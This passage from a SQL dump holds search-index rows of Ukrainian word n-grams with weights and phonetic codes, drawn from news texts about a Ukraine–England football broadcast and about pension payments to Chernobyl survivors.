онлайн',0,1,1.6,'п000',1,'*'),(1672367,'переглянути онлайн на','переглянути онлайн на',0,1,1.7,'п000',1,'*'),(1672368,'перемога синьо-жовтих','перемога синьо-жовтих',0,1,1.7,'п000',1,'*'),(1672369,'перемога синьо-жовтих 1','перемога синьо-жовтих 1',0,1,1.7667,'п000',1,'*'),(1672370,'перемоги','перемоги',0,0,0.5333,'п000',1,'*'),(1672371,'перемоги 2','перемоги 2',0,1,1.3333,'п000',1,'*'),(1672372,'перемоги 2 нічиї','перемоги 2 нічиї',0,1,1.5333,'п000',1,'*'),(1672373,'переможний','переможний',0,0,0.6667,'п000',1,'*'),(1672374,'переможний м\'яч','переможний м',0,1,1.5,'п000',1,'*'),(1672375,'переможний м\'яч у','переможний м у',0,1,1.5667,'п000',1,'*'),(1672376,'платфо','платфо',0,0,0.4,'п000',1,'*'),(1672377,'платфо рмі','платфо рмі',0,1,1.3333,'п000',1,'*'),(1672378,'платфо рмі oll','платфо рмі oll',0,1,1.4667,'п400',1,'*'),(1672379,'поєдинок','поєдинок',0,0,0.5333,'п000',1,'*'),(1672380,'поєдинок на','поєдинок на',0,1,1.3667,'п000',1,'*'),(1672381,'поєдинок на трк','поєдинок на трк',0,1,1.5,'п000',1,'*'),(1672382,'поєдинок україна','поєдинок україна',0,1,1.5333,'п000',1,'*'),(1672383,'поєдинок україна англія','поєдинок україна англія',0,1,1.7667,'п000',1,'*'),(1672384,'покаже','покаже',0,0,0.4,'п000',1,'*'),(1672385,'покаже матч','покаже матч',0,1,1.3667,'п000',1,'*'),(1672386,'покаже матч команди','покаже матч команди',0,1,1.6333,'п000',1,'*'),(1672387,'покажуть','покажуть',0,0,0.5333,'п000',1,'*'),(1672388,'покажуть кілька','покажуть кілька',0,1,1.5,'п000',1,'*'),(1672389,'покажуть кілька трансляторів','покажуть кілька трансляторів',0,1,1.9333,'п000',1,'*'),(1672390,'поразка','поразка',0,0,0.4667,'п000',1,'*'),(1672391,'поразка єдина','поразка єдина',0,1,1.4333,'п000',1,'*'),(1672392,'поразка єдина перемога','поразка єдина перемога',0,1,1.7333,'п000',1,'*'),(1672393,'початок матчу','початок матчу',0,1,1.4333,'п000',1,'*'),(1672394,'початок матчу о','початок матчу о',0,1,1.5,'п000',1,'*'),(1672395,'початок трансляції','початок трансляції',0,1,1.6,'п000',1,'*'),(1672396,'початок трансляції о','початок трансляції о',0,1,1.6667,'п000',1,'*'),(1672397,'починаючи','починаючи',0,0,0.6,'п000',1,'*'),(1672398,'починаючи з','починаючи з',0,1,1.3667,'п000',1,'*'),(1672399,'починаючи з 21','починаючи з 21',0,1,1.4667,'п000',1,'*'),(1672400,'прямому','прямому',0,0,0.4667,'п000',1,'*'),(1672401,'прямому ефірі','прямому ефірі',0,1,1.4333,'п000',1,'*'),(1672402,'прямому ефірі на','прямому ефірі на',0,1,1.5333,'п000',1,'*'),(1672403,'разів','разів',0,0,0.3333,'р000',1,'*'),(1672404,'разів перевага','разів перевага',0,1,1.4667,'р000',1,'*'),(1672405,'разів перевага на','разів перевага на',0,1,1.5667,'р000',1,'*'),(1672406,'раніше','раніше',0,0,0.4,'р000',2,'*'),(1672407,'раніше 7','раніше 7',0,1,1.2667,'р000',1,'*'),(1672408,'раніше 7 разів','раніше 7 разів',0,1,1.4667,'р000',1,'*'),(1672409,'римі','римі',0,0,0.2667,'р000',1,'*'),(1672410,'римі на','римі на',0,1,1.2333,'р000',1,'*'),(1672411,'римі на стадіо','римі на стадіо',0,1,1.4667,'р000',1,'*'),(1672412,'рмі','рмі',0,0,0.2,'р000',1,'*'),(1672413,'рмі oll','рмі oll',0,1,1.2333,'р400',1,'*'),(1672414,'рмі oll tv','рмі oll tv',0,1,1.3333,'р431',1,'*'),(1672415,'сергій назаренко','сергій назаренко',0,1,1.5333,'с000',1,'*'),(1672416,'синьо-жовтих','синьо-жовтих',0,0,0.8,'с000',1,'*'),(1672417,'синьо-жовтих 1','синьо-жовтих 1',0,1,1.4667,'с000',1,'*'),(1672418,'синьо-жовтих 1 0','синьо-жовтих 1 0',0,1,1.5333,'с000',1,'*'),(1672419,'стадіо','стадіо',0,0,0.4,'с000',1,'*'),(1672420,'стадіо олімпіко','стадіо олімпіко',0,1,1.5,'с000',1,'*'),(1672421,'стадіо олімпіко 3','стадіо олімпіко 3',0,1,1.5667,'с000',1,'*'),(1672422,'та англії','та англії',0,1,1.3,'т000',1,'*'),(1672423,'та англії зустрічалися','та англії зустрічалися',0,1,1.7333,'т000',1,'*'),(1672424,'також покаже','також покаже',0,1,1.4,'т000',1,'*'),(1672425,'також покаже матч','також покаже матч',0,1,1.5667,'т000',1,'*'),(1672426,'телеканалі','телеканалі',0,0,0.6667,'т000',1,'*'),(1672427,'телеканалі футбол','телеканалі футбол',0,1,1.5667,'т000',1,'*'),(1672428,'телеканалі футбол 1','телеканалі футбол 1',0,1,1.6333,'т000',1,'*'),(1672429,'території','території',0,0,0.6,'т000',1,'*'),(1672430,'території україни','території україни',0,1,1.5667,'т000',1,'*'),(1672431,'території україни покажуть','території україни покажуть',0,1,1.8667,'т000',1,'*'),(1672432,'того гру','того гру',0,1,1.2667,'т000',1,'*'),(1672433,'того гру можна','того гру можна',0,1,1.4667,'т000',1,'*'),(1672434,'тоді','тоді',0,0,0.2667,'т000',1,'*'),(1672435,'тоді забив','тоді забив',0,1,1.3333,'т000',1,'*'),(1672436,'тоді забив сергій','тоді забив сергій',0,1,1.5667,'т000',1,'*'),(1672437,'трансляторів','трансляторів',0,0,0.8,'т000',1,'*'),(1672438,'трансляторів дивитись','трансляторів дивитись',0,1,1.7,'т000',1,'*'),(1672439,'трансляторів дивитись матч','трансляторів дивитись матч',0,1,1.8667,'т000',1,'*'),(1672440,'трансляції','трансляції',0,0,0.6667,'т000',1,'*'),(1672441,'трансляції о','трансляції о',0,1,1.4,'т000',1,'*'),(1672442,'трансляції о 21','трансляції о 21',0,1,1.5,'т000',1,'*'),(1672443,'трапилася','трапилася',0,0,0.6,'т000',1,'*'),(1672444,'трапилася у','трапилася у',0,1,1.3667,'т000',1,'*'),(1672445,'трапилася у кваліфікації','трапилася у кваліфікації',0,1,1.8,'т000',1,'*'),(1672446,'трк','трк',0,0,0.2,'т000',1,'*'),(1672447,'трк україна','трк україна',0,1,1.3667,'т000',1,'*'),(1672448,'трк україна можна','трк україна можна',0,1,1.5667,'т000',1,'*'),(1672449,'трк україна також','трк україна також',0,1,1.5667,'т000',1,'*'),(1672450,'трьох левів','трьох левів',0,1,1.3667,'т000',1,'*'),(1672451,'трьох левів 4','трьох левів 4',0,1,1.4333,'т000',1,'*'),(1672452,'у дніпрі','у дніпрі',0,1,1.2667,'у000',1,'*'),(1672453,'у дніпрі тоді','у дніпрі тоді',0,1,1.4333,'у000',1,'*'),(1672454,'у кваліфікації','у кваліфікації',0,1,1.4667,'у000',1,'*'),(1672455,'у кваліфікації до','у кваліфікації до',0,1,1.5667,'у000',1,'*'),(1672456,'у прямому','у прямому',0,1,1.3,'у000',1,'*'),(1672457,'у прямому ефірі','у прямому ефірі',0,1,1.5,'у000',1,'*'),(1672458,'у римі','у римі',0,1,1.2,'у000',1,'*'),(1672459,'у римі на','у римі на',0,1,1.3,'у000',1,'*'),(1672460,'україна англія','україна англія',0,1,1.4667,'у000',1,'*'),(1672461,'україна англія відбудеться','україна англія відбудеться',0,1,1.8667,'у000',1,'*'),(1672462,'україна англія де','україна англія де',0,1,1.5667,'у000',1,'*'),(1672463,'україна англія онлайн','україна англія онлайн',0,1,1.7,'у000',1,'*'),(1672464,'україна можна','україна можна',0,1,1.4333,'у000',1,'*'),(1672465,'україна можна переглянути','україна можна переглянути',0,1,1.8333,'у000',1,'*'),(1672466,'україна також','україна також',0,1,1.4333,'у000',1,'*'),(1672467,'україна також покаже','україна також покаже',0,1,1.6667,'у000',1,'*'),(1672468,'україни покажуть','україни покажуть',0,1,1.5333,'у000',1,'*'),(1672469,'україни покажуть кілька','україни покажуть кілька',0,1,1.7667,'у000',1,'*'),(1672470,'україни та англії','україни та англії',0,1,1.5667,'у000',1,'*'),(1672471,'футбол','футбол',0,0,0.4,'ф000',1,'*'),(1672472,'футбол 1','футбол 1',0,1,1.2667,'ф000',1,'*'),(1672473,'футбол 1 починаючи','футбол 1 починаючи',0,1,1.6,'ф000',1,'*'),(1672474,'чемпіонату','чемпіонату',0,0,0.6667,'ч000',1,'*'),(1672475,'чемпіонату європи','чемпіонату європи',0,1,1.5667,'ч000',1,'*'),(1672476,'чемпіонату європи початок','чемпіонату європи початок',0,1,1.8333,'ч000',1,'*'),(1672477,'чемпіонату європи-2020','чемпіонату європи-2020',0,1,1.7333,'ч000',1,'*'),(1672478,'чс-2010','чс-2010',0,0,0.4667,'ч000',1,'*'),(1672479,'чс-2010 переможний','чс-2010 переможний',0,1,1.6,'ч000',1,'*'),(1672480,'чс-2010 переможний м\'яч','чс-2010 переможний м',0,1,1.7667,'ч000',1,'*'),(1672481,'шевченка','шевченка',0,0,0.5333,'ш000',1,'*'),(1672482,'шевченка в','шевченка в',0,1,1.3333,'ш000',1,'*'),(1672483,'шевченка в 1','шевченка в 1',0,1,1.4,'ш000',1,'*'),(1678832,'080','080',0,0,0.3,'',1,'*'),(1678833,'080 гривень','080 гривень',0,1,1.3667,'г000',1,'*'),(1678834,'080 гривень другої','080 гривень другої',0,1,1.6,'г000',1,'*'),(1678835,'1 липня','1 липня',0,1,1.2333,'л000',1,'*'),(1678836,'1 липня про','1 липня про',0,1,1.3667,'л000',1,'*'),(1678837,'1 січня','1 січня',0,1,1.2333,'с000',2,'*'),(1678838,'1 січня 2022','1 січня 2022',0,1,1.4,'с000',2,'*'),(1678839,'1 січня відповідного','1 січня відповідного',0,1,1.6667,'с000',1,'*'),(1678840,'12 987','12 987',0,1,1.2,'',1,'*'),(1678841,'12 987 гривень','12 987 гривень',0,1,1.4667,'г000',1,'*'),(1678842,'12 місяців зарплата','12 місяців зарплата',0,1,1.6333,'м000',1,'*'),(1678843,'16 080','16 080',0,1,1.2,'',1,'*'),(1678844,'16 080 гривень','16 080 гривень',0,1,1.4667,'г000',1,'*'),(1678845,'2 2525','2 2525',0,1,1.2,'',1,'*'),(1678846,'2 2525 do','2 2525 do',0,1,1.3,'D000',1,'*'),(1678847,'2022','2022',0,0,0.4,'',3,'*'),(1678848,'2022 року','2022 року',0,1,1.3,'р000',3,'*'),(1678849,'2022 року документ','2022 року документ',0,1,1.6,'р000',1,'*'),(1678850,'2525','2525',0,0,0.4,'',1,'*'),(1678851,'2525 do','2525 do',0,1,1.2333,'D000',1,'*'),(1678852,'2525 do vidoma','2525 do vidoma',0,1,1.4667,'D135',1,'*'),(1678853,'30 календарних','30 календарних',0,1,1.4667,'к000',1,'*'),(1678854,'30 календарних днів','30 календарних днів',0,1,1.6333,'к000',1,'*'),(1678855,'8 917','8 917',0,1,1.1667,'',1,'*'),(1678856,'8 917 гривень','8 917 гривень',0,1,1.4333,'г000',1,'*'),(1678857,'917','917',0,0,0.3,'',1,'*'),(1678858,'917 гривень','917 гривень',0,1,1.3667,'г000',1,'*'),(1678859,'987','987',0,0,0.3,'',1,'*'),(1678860,'987 гривень','987 гривень',0,1,1.3667,'г000',1,'*'),(1678861,'987 гривень третьої','987 гривень третьої',0,1,1.6333,'г000',1,'*'),(1678862,'chornobiltsiv','chornobiltsiv',0,0,0.8667,'C6514321',1,'*'),(1678863,'do vidoma','do vidoma',0,1,1.3,'D135',1,'*'),(1678864,'do vidoma pensioneriv','do vidoma pensioneriv',0,1,1.7,'D135152561',1,'*'),(1678865,'novini 2 2525','novini 2 2525',0,1,1.4333,'N150',1,'*'),(1678866,'pensioneriv','pensioneriv',0,0,0.7333,'P52561',1,'*'),(1678867,'pensioneriv chornobiltsiv','pensioneriv chornobiltsiv',0,1,1.8333,'P5256126514321',1,'*'),(1678868,'vidoma','vidoma',0,0,0.4,'V350',1,'*'),(1678869,'vidoma pensioneriv','vidoma pensioneriv',0,1,1.6,'V35152561',1,'*'),(1678870,'vidoma pensioneriv chornobiltsiv','vidoma pensioneriv chornobiltsiv',0,1,2,'V3515256126514321',1,'*'),(1678871,'і внаслідок','і внаслідок',0,1,1.3667,'і000',1,'*'),(1678872,'і внаслідок цього','і внаслідок цього',0,1,1.5667,'і000',1,'*'),(1678873,'і не залежить','і не залежить',0,1,1.4333,'і000',1,'*'),(1678874,'із закону','із закону',0,1,1.3,'і000',1,'*'),(1678875,'із закону випливає','із закону випливає',0,1,1.6,'і000',1,'*'),(1678876,'із застосуванням','із застосуванням',0,1,1.5333,'і000',1,'*'),(1678877,'із застосуванням ядерної','із застосуванням ядерної',0,1,1.8,'і000',1,'*'),(1678878,'інвалідність','інвалідність',0,0,0.8,'і000',1,'*'),(1678879,'інвалідність складуть','інвалідність складуть',0,1,1.7,'і000',1,'*'),(1678880,'інвалідність складуть першої','інвалідність складуть першої',0,1,1.9333,'і000',1,'*'),(1678881,'інвалідністю','інвалідністю',0,0,0.8,'і000',1,'*'),(1678882,'інвалідністю надали','інвалідністю надали',0,1,1.6333,'і000',1,'*'),(1678883,'інвалідністю надали право','інвалідністю надали право',0,1,1.8333,'і000',1,'*'),(1678884,'інвалідності','інвалідності',0,0,0.8,'і000',1,'*'),(1678885,'інвалідності що','інвалідності що',0,1,1.5,'і000',1,'*'),(1678886,'інвалідності що настала','інвалідності що настала',0,1,1.7667,'і000',1,'*'),(1678887,'інших доходів','інших доходів',0,1,1.4333,'і000',1,'*'),(1678888,'інших пенсій','інших пенсій',0,1,1.4,'і000',1,'*'),(1678889,'інших пенсій чи','інших пенсій чи',0,1,1.5,'і000',1,'*'),(1678890,'інших ядерних','інших ядерних',0,1,1.4333,'і000',1,'*'),(1678891,'інших ядерних аварій','інших ядерних аварій',0,1,1.6667,'і000',1,'*'),(1678892,'їх наслідків','їх наслідків',0,1,1.4,'ї000',1,'*'),(1678893,'їх наслідків у','їх наслідків у',0,1,1.4667,'ї000',1,'*'),(1678894,'аварії','аварії',0,0,0.4,'а000',1,'*'),(1678895,'аварії на','аварії на',0,1,1.3,'а000',1,'*'),(1678896,'аварії на чаес','аварії на чаес',0,1,1.4667,'а000',1,'*'),(1678897,'аварій','аварій',0,0,0.4,'а000',1,'*'),(1678898,'аварій та','аварій та',0,1,1.3,'а000',1,'*'),(1678899,'аварій та їх','аварій та їх',0,1,1.4,'а000',1,'*'),(1678900,'адресної','адресної',0,0,0.5333,'а000',1,'*'),(1678901,'адресної допомоги','адресної допомоги',0,1,1.5667,'а000',1,'*'),(1678902,'адресної допомоги до','адресної допомоги до',0,1,1.6667,'а000',1,'*'),(1678903,'безпосередню','безпосередню',0,0,0.8,'б000',1,'*'),(1678904,'безпосередню участь','безпосередню участь',0,1,1.6333,'б000',1,'*'),(1678905,'безпосередню участь у','безпосередню участь у',0,1,1.7,'б000',1,'*'),(1678906,'брали','брали',0,0,0.3333,'б000',1,'*'),(1678907,'брали безпосередню','брали безпосередню',0,1,1.6,'б000',1,'*'),(1678908,'брали безпосередню участь','брали безпосередню участь',0,1,1.8333,'б000',1,'*'),(1678909,'будуть виходити','будуть виходити',0,1,1.5,'б000',1,'*'),(1678910,'будуть виходити з','будуть виходити з',0,1,1.5667,'б000',1,'*'),(1678911,'будь-які','будь-які',0,0,0.5333,'б000',1,'*'),(1678912,'будь-які фактичні','будь-які фактичні',0,1,1.5667,'б000',1,'*'),(1678913,'будь-які фактичні відпрацьовані','будь-які фактичні відпрацьовані',0,1,2,'б000',1,'*'),(1678914,'в результаті','в результаті',0,1,1.4,'в000',1,'*'),(1678915,'в результаті аварії','в результаті аварії',0,1,1.6333,'в000',1,'*'),(1678916,'в україні частково','в україні частково',0,1,1.6,'в000',1,'*'),(1678917,'від зарплати','від зарплати',0,1,1.4,'в000',1,'*'),(1678918,'від зарплати інших','від зарплати інших',0,1,1.6,'в000',1,'*'),(1678919,'від розміру','від розміру',0,1,1.3667,'в000',1,'*'),(1678920,'від розміру мінімальної','від розміру мінімальної',0,1,1.7667,'в000',1,'*'),(1678921,'відома','відома',0,0,0.4,'в000',2,'*'),(1678922,'відома пенсіонерів','відома пенсіонерів',0,1,1.6,'в000',1,'*'),(1678923,'відома пенсіонерів чорнобильців','відома пенсіонерів чорнобильців',0,1,2,'в000',1,'*'),(1678924,'відповідного','відповідного',0,0,0.8,'в000',2,'*'),(1678925,'відповідного року','відповідного року',0,1,1.5667,'в000',1,'*'),(1678926,'відповідного року так','відповідного року так',0,1,1.7,'в000',1,'*'),(1678927,'відпрацьовані','відпрацьовані',0,0,0.8667,'в000',1,'*'),(1678928,'відпрацьовані 30','відпрацьовані 30',0,1,1.5333,'в000',1,'*'),(1678929,'відпрацьовані 30 календарних','відпрацьовані 30 календарних',0,1,1.9333,'в000',1,'*'),(1678930,'відпрацьованих','відпрацьованих',0,0,0.9333,'в000',1,'*'),(1678931,'відпрацьованих місяців','відпрацьованих місяців',0,1,1.7333,'в000',1,'*'),(1678932,'відпрацьованих місяців менше','відпрацьованих місяців менше',0,1,1.9333,'в000',1,'*'),(1678933,'військових навчаннях','військових навчаннях',0,1,1.6667,'в000',1,'*'),(1678934,'військових навчаннях із','військових навчаннях із',0,1,1.7667,'в000',1,'*'),(1678935,'він набере','він набере',0,1,1.3333,'в000',1,'*'),(1678936,'він набере чинності','він набере чинності',0,1,1.6333,'в000',1,'*'),(1678937,'виданні','виданні',0,0,0.4667,'в000',1,'*'),(1678938,'виданні голос','виданні голос',0,1,1.4333,'в000',1,'*'),(1678939,'виданні голос україни','виданні голос україни',0,1,1.7,'в000',1,'*'),(1678940,'визначається','визначається',0,0,0.8,'в000',2,'*'),(1678941,'визначається за','визначається за',0,1,1.5,'в000',1,'*'),(1678942,'визначається за будь-які','визначається за будь-які',0,1,1.8,'в000',1,'*'),(1678943,'визначається за один','визначається за один',0,1,1.6667,'в000',1,'*'),(1678944,'визначається за формулою','визначається за формулою',0,1,1.8,'в000',1,'*'),(1678945,'виплати','виплати',0,0,0.4667,'в000',1,'*'),(1678946,'виплати для','виплати для',0,1,1.3667,'в000',1,'*'),(1678947,'виплати для чорнобильців','виплати для чорнобильців',0,1,1.8,'в000',1,'*'),(1678948,'виплачується','виплачується',0,0,0.8,'в000',1,'*'),(1678949,'виплачується повністю','виплачується повністю',0,1,1.7,'в000',1,'*'),(1678950,'виплачується повністю і','виплачується повністю і',0,1,1.7667,'в000',1,'*'),(1678951,'випливає','випливає',0,0,0.5333,'в000',1,'*'),(1678952,'випливає що','випливає що',0,1,1.3667,'в000',1,'*'),(1678953,'випливає що додаткова','випливає що додаткова',0,1,1.7,'в000',1,'*'),(1678954,'випробуваннях','випробуваннях',0,0,0.8667,'в000',1,'*'),(1678955,'випробуваннях у','випробуваннях у',0,1,1.5,'в000',1,'*'),(1678956,'випробуваннях у військових','випробуваннях у військових',0,1,1.8667,'в000',1,'*'),(1678957,'виходити','виходити',0,0,0.5333,'в000',1,'*'),(1678958,'виходити з','виходити з',0,1,1.3333,'в000',1,'*'),(1678959,'виходити з різних','виходити з різних',0,1,1.5667,'в000',1,'*'),(1678960,'внаслідок каліцтва','внаслідок каліцтва',0,1,1.6,'в000',1,'*'),(1678961,'внаслідок каліцтва чи','внаслідок каліцтва чи',0,1,1.7,'в000',1,'*'),(1678962,'внаслідок цього','внаслідок цього',0,1,1.5,'в000',1,'*'),(1678963,'внаслідок цього стали','внаслідок цього стали',0,1,1.7,'в000',1,'*'),(1678964,'внаслідок чорнобильської','внаслідок чорнобильської',0,1,1.8,'в000',1,'*'),(1678965,'внаслідок чорнобильської катастрофи','внаслідок чорнобильської катастрофи',0,1,2,'в000',1,'*'),(1678966,'встановленої','встановленої',0,0,0.8,'в000',1,'*'),(1678967,'встановленої на','встановленої на',0,1,1.5,'в000',1,'*'),(1678968,'встановленої на 1','встановленої на 1',0,1,1.5667,'в000',1,'*'),(1678969,'втратою','втратою',0,0,0.4667,'в000',1,'*'),(1678970,'втратою годувальника','втратою годувальника',0,1,1.6667,'в000',1,'*'),(1678971,'втратою годувальника внаслідок','втратою годувальника внаслідок',0,1,2,'в000',1,'*'),(1678972,'втрату','втрату',0,0,0.4,'в000',1,'*'),(1678973,'втрату годувальника','втрату годувальника',0,1,1.6333,'в000',1,'*'),(1678974,'втрату годувальника внаслідок','втрату годувальника внаслідок',0,1,1.9667,'в000',1,'*'),(1678975,'вчора','вчора',0,0,0.3333,'в000',1,'*'),(1678976,'вчора опублікували','вчора опублікували',0,1,1.6,'в000',1,'*'),(1678977,'вчора опублікували у','вчора опублікували у',0,1,1.6667,'в000',1,'*'),(1678978,'годувальника','годувальника',0,0,0.8,'г000',1,'*'),(1678979,'годувальника внаслідок','годувальника внаслідок',0,1,1.7333,'г000',1,'*'),(1678980,'годувальника внаслідок чорнобильської','годувальника внаслідок чорнобильської',0,1,2,'г000',1,'*'),(1678981,'голос україни','голос україни',0,1,1.4333,'г000',1,'*'),(1678982,'голос україни ряд','голос україни ряд',0,1,1.5667,'г000',1,'*'),(1678983,'гривень','гривень',0,0,0.4667,'г000',1,'*'),(1678984,'гривень другої','гривень другої',0,1,1.4667,'г000',1,'*'),(1678985,'гривень другої групи','гривень другої групи',0,1,1.6667,'г000',1,'*'),(1678986,'гривень третьої','гривень третьої',0,1,1.5,'г000',1,'*'),(1678987,'гривень третьої групи','гривень третьої групи',0,1,1.7,'г000',1,'*'),(1678988,'групи 12','групи 12',0,1,1.2667,'г000',1,'*'),(1678989,'групи 12 987','групи 12 987',0,1,1.4,'г000',1,'*'),(1678990,'групи 16','групи 16',0,1,1.2667,'г000',1,'*'),(1678991,'групи 16 080','групи 16 080',0,1,1.4,'г000',1,'*'),(1678992,'групи 8','групи 8',0,1,1.2333,'г000',1,'*'),(1678993,'групи 8 917','групи 8 917',0,1,1.3667,'г000',1,'*'),(1678994,'ділиться','ділиться',0,0,0.5333,'д000',1,'*'),(1678995,'ділиться на','ділиться на',0,1,1.3667,'д000',1,'*'),(1678996,'ділиться на число','ділиться на число',0,1,1.5667,'д000',1,'*'),(1678997,'двох','двох',0,0,0.2667,'д000',2,'*'),(1678998,'двох місяцях','двох місяцях',0,1,1.4,'д000',1,'*'),(1678999,'двох місяцях зарплата','двох місяцях зарплата',0,1,1.7,'д000',1,'*'),(1679000,'державної','державної',0,0,0.6,'д000',1,'*'),(1679001,'державної адресної','державної адресної',0,1,1.6,'д000',1,'*'),(1679002,'державної адресної допомоги','державної адресної допомоги',0,1,1.9,'д000',1,'*'),(1679003,'держпенсію','держпенсію',0,0,0.6667,'д000',1,'*'),(1679004,'держпенсію у','держпенсію у',0,1,1.4,'д000',1,'*'),(1679005,'держпенсію у розмірі','держпенсію у розмірі',0,1,1.6667,'д000',1,'*'),(1679006,'для нарахування','для нарахування',0,1,1.5,'д000',1,'*'),(1679007,'для нарахування певного','для нарахування певного',0,1,1.7667,'д000',1,'*'),(1679008,'для чорнобильців','для чорнобильців',0,1,1.5333,'д000',1,'*'),(1679009,'для чорнобильців повністю','для чорнобильців повністю',0,1,1.8333,'д000',1,'*'),(1679010,'для чорнобильців які','для чорнобильців які',0,1,1.6667,'д000',1,'*'),(1679011,'днів роботи','днів роботи',0,1,1.3667,'д000',1,'*'),(1679012,'днів роботи як','днів роботи як',0,1,1.4667,'д000',1,'*'),(1679013,'днів у','днів у',0,1,1.2,'д000',1,'*'),(1679014,'днів у двох','днів у двох',0,1,1.3667,'д000',1,'*'),(1679015,'до відома','до відома',0,1,1.3,'д000',2,'*'),(1679016,'до відома пенсіонерів','до відома пенсіонерів',0,1,1.7,'д000',1,'*'),(1679017,'до заробітної','до заробітної',0,1,1.4333,'д000',1,'*'),(1679018,'до заробітної плати','до заробітної плати',0,1,1.6333,'д000',1,'*'),(1679019,'до пенсії','до пенсії',0,1,1.3,'д000',1,'*'),(1679020,'до пенсії із','до пенсії із',0,1,1.4,'д000',1,'*'),(1679021,'додаванням','додаванням',0,0,0.6667,'д000',1,'*'),(1679022,'додаванням до','додаванням до',0,1,1.4333,'д000',1,'*'),(1679023,'додаванням до заробітної','додаванням до заробітної',0,1,1.8,'д000',1,'*'),(1679024,'додаткова','додаткова',0,0,0.6,'д000',1,'*'),(1679025,'додаткова пенсія','додаткова пенсія',0,1,1.5333,'д000',1,'*'),(1679026,'додаткова пенсія за','додаткова пенсія за',0,1,1.6333,'д000',1,'*'),(1679027,'документ','документ',0,0,0.5333,'д000',2,'*'),(1679028,'документ вчора','документ вчора',0,1,1.4667,'д000',1,'*'),(1679029,'документ вчора опублікували','документ вчора опублікували',0,1,1.9,'д000',1,'*'),(1679030,'документі','документі',0,0,0.6,'д000',1,'*'),(1679031,'документі прописано','документі прописано',0,1,1.6333,'д000',1,'*'),(1679032,'документі прописано що','документі прописано що',0,1,1.7333,'д000',1,'*'),(1679033,'допомоги до','допомоги до',0,1,1.3667,'д000',1,'*'),(1679034,'допомоги до пенсії','допомоги до пенсії',0,1,1.6,'д000',1,'*'),(1679035,'доходів','доходів',0,0,0.4667,'д000',1,'*'),(1679036,'другої','другої',0,0,0.4,'д000',1,'*'),(1679037,'другої групи','другої групи',0,1,1.4,'д000',1,'*'),(1679038,'другої групи 12','другої групи 12',0,1,1.5,'д000',1,'*'),(1679039,'з 1','з 1',0,1,1.1,'з000',3,'*'),(1679040,'з 1 липня','з 1 липня',0,1,1.3,'з000',1,'*'),(1679041,'з 1 січня','з 1 січня',0,1,1.3,'з000',2,'*'),(1679042,'з інвалідністю','з інвалідністю',0,1,1.4667,'з000',1,'*'),(1679043,'з інвалідністю надали','з інвалідністю надали',0,1,1.7,'з000',1,'*'),(1679044,'з втратою','з втратою',0,1,1.3,'з000',1,'*'),(1679045,'з втратою годувальника','з втратою годувальника',0,1,1.7333,'з000',1,'*'),(1679046,'з додаванням','з додаванням',0,1,1.4,'з000',1,'*'),(1679047,'з додаванням до','з додаванням до',0,1,1.5,'з000',1,'*'),(1679048,'з різних','з різних',0,1,1.2667,'з000',1,'*'),(1679049,'з різних формул','з різних формул',0,1,1.5,'з000',1,'*'),(1679050,'за будь-які','за будь-які',0,1,1.3667,'з000',1,'*'),(1679051,'за будь-які фактичні','за будь-які фактичні',0,1,1.6667,'з000',1,'*'),(1679052,'за втрату','за втрату',0,1,1.3,'з000',1,'*'),(1679053,'за втрату годувальника','за втрату годувальника',0,1,1.7333,'з000',1,'*'),(1679054,'за один','за один',0,1,1.2333,'з000',1,'*'),(1679055,'за один календарний','за один календарний',0,1,1.6333,'з000',1,'*'),(1679056,'за формулою','за формулою',0,1,1.3667,'з000',1,'*'),(1679057,'за формулою зарплата','за формулою зарплата',0,1,1.6667,'з000',1,'*'),(1679058,'за ці','за ці',0,1,1.1667,'з000',1,'*'),(1679059,'за ці місяці','за ці місяці',0,1,1.4,'з000',1,'*'),(1679060,'за шкоду','за шкоду',0,1,1.2667,'з000',1,'*'),(1679061,'за шкоду заподіяну','за шкоду заподіяну',0,1,1.6,'з000',1,'*'),(1679062,'забруднення','забруднення',0,0,0.7333,'з000',1,'*'),(1679063,'забруднення будуть','забруднення будуть',0,1,1.6,'з000',1,'*'),(1679064,'забруднення будуть виходити','забруднення будуть виходити',0,1,1.9,'з000',1,'*'),(1679065,'закон','закон',0,0,0.3333,'з000',1,'*'),(1679066,'закон що','закон що',0,1,1.2667,'з000',1,'*'),(1679067,'закон що передбачає','закон що передбачає',0,1,1.6333,'з000',1,'*'),(1679068,'закону випливає','закону випливає',0,1,1.5,'з000',1,'*'),(1679069,'закону випливає що','закону випливає що',0,1,1.6,'з000',1,'*'),(1679070,'залежить від','залежить від',0,1,1.4,'з000',1,'*'),(1679071,'залежить від зарплати','залежить від зарплати',0,1,1.7,'з000',1,'*'),(1679072,'заподіяну','заподіяну',0,0,0.6,'з000',1,'*'),(1679073,'заподіяну здоров\'ю','заподіяну здоров',0,1,1.6,'з000',1,'*'),(1679074,'заподіяну здоров\'ю та','заподіяну здоров та',0,1,1.7,'з000',1,'*'),(1679075,'заробітної','заробітної',0,0,0.6667,'з000',1,'*'),(1679076,'заробітної плати','заробітної плати',0,1,1.5333,'з000',1,'*'),(1679077,'заробітної плати на','заробітної плати на',0,1,1.6333,'з000',1,'*'),(1679078,'зарплата','зарплата',0,0,0.5333,'з000',1,'*'),(1679079,'зарплата визначається','зарплата визначається',0,1,1.7,'з000',1,'*'),(1679080,'зарплата визначається за','зарплата визначається за',0,1,1.8,'з000',1,'*'),(1679081,'зарплата за','зарплата за',0,1,1.3667,'з000',1,'*'),(1679082,'зарплата за ці','зарплата за ці',0,1,1.4667,'з000',1,'*'),(1679083,'зарплати','зарплати',0,0,0.5333,'з000',1,'*'),(1679084,'зарплати інших','зарплати інших',0,1,1.4667,'з000',1,'*'),(1679085,'зарплати інших пенсій','зарплати інших пенсій',0,1,1.7,'з000',1,'*'),(1679086,'зарплати встановленої','зарплати встановленої',0,1,1.7,'з000',1,'*'),(1679087,'зарплати встановленої на','зарплати встановленої на',0,1,1.8,'з000',1,'*'),(1679088,'застосуванням ядерної','застосуванням ядерної',0,1,1.7,'з000',1,'*'),(1679089,'застосуванням ядерної зброї','застосуванням ядерної зброї',0,1,1.9,'з000',1,'*'),(1679090,'захворювання','захворювання',0,0,0.8,'з000',1,'*'),(1679091,'захворювання у','захворювання у',0,1,1.4667,'з000',1,'*'),(1679092,'захворювання у зв\'язку','захворювання у зв',0,1,1.7333,'з000',1,'*'),(1679093,'зброї і','зброї і',0,1,1.2333,'з000',1,'*'),(1679094,'зброї і внаслідок','зброї і внаслідок',0,1,1.5667,'з000',1,'*'),(1679095,'зв\'язку з','зв з',0,1,1.3,'з000',1,'*'),(1679096,'зв\'язку з втратою','зв з 